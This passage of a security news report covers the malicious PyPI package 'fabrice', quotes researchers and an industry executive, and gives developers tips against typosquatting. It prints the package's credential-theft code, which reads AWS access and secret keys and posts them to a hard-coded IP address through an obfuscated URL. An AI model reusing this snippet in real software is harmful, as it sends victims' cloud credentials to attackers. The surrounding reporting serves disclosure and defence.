In its **report** shared with Hackread.com ahead of publishing, both methods lead to the extraction of AWS credentials, sending them to a server located in Paris, operated by M247, a VPN service provider. This could allow attackers to abuse these credentials for unauthorized access to cloud resources. What’s worse, the campaign remains active despite researchers’ alerts to PyPI.

****Example of AWS Credential Exfiltration****

session = boto3.Session()  
cd = session.get_credentials()  
ak = cd.access_key  
sk = cd.secret_key  
data = {"k": ak, "s": sk}  
muri = "ht"+"tp"+":"+"//89.44.9.227/akkfuifkeifsa"  
requests.post(muri, json=data, timeout=4

> _“Recognizing the severe risk fabrice poses, our team has proactively reported it to the PyPI team for takedown to safeguard the broader developer community. It is still live at the time of publishing.”_
> 
> Socket Security

Rom Carmel, Co-Founder and CEO of Identity Security platform **Apono** weighed in on the latest development stating, _“_Malicious actors continue to find success by putting malicious software packages out into the developer community, playing a numbers game that a percentage of developers will make the very human mistake of choosing the wrong package for their code._“_

_“_While methods like improving security awareness education and implementing processes for secure coding can go a long way in helping developers to make more secure decisions as we see with phishing, security teams need to take steps to secure their organizations from an assumed breach approach,_“_ Rom warned.

_“_To protect your organization once credentials are compromised as we see on a near daily basis, we need to think in terms of defence in depth. That means implementing not only MFA but also reducing the blast radius from an account takeover in terms of the availability of access and the scope of privileges that attackers can use,_“_ he advised.

****Additional Security Measures for Developers****

Developers are the backbone of any project. The information that can be extracted from them can become a treasure trove if it falls into the wrong hands. Lately, **Python developers, in particular**, have been heavily targeted by threat actors. Here are some tips to protect your data and accounts from hackers and malware attacks:

*   **Stay Informed**: Keep yourself up-to-date about security advisories from platforms like PyPI. Community reports and security research blogs can be valuable in staying protected against threats like Fabrice.
*   **Double-check for typosquatting:** Always double-check the names of packages before installation. Look for signs of typosquatting like slight misspellings or unusual publisher names.
*   **Use Security Tools**: Employ tools like Socket for GitHub, which provides real-time monitoring and security checks for dependencies in your projects. Such tools can automatically detect and alert suspicious activities or known malicious packages.
*   **Regular Security Audits**: Regularly review and audit the software dependencies of your projects. Make sure that all packages are from trusted sources and serve a legitimate purpose.
*   **Follow Hackread.com:** Most importantly, follow Hackread.com.

1.  **Why is learning Python important in Data Science?**
2.  **6 official Python repositories plagued with cryptomining malware**
3.  **PythonAnywhere Cloud Platform Abused for Hosting Ransomware**
4.  **NTLM Credential Theft in Python Apps Threaten Windows Security**
5.  **Python in Threat Intelligence: Analyzing – Mitigating Cyber Threats**

Tag

#intel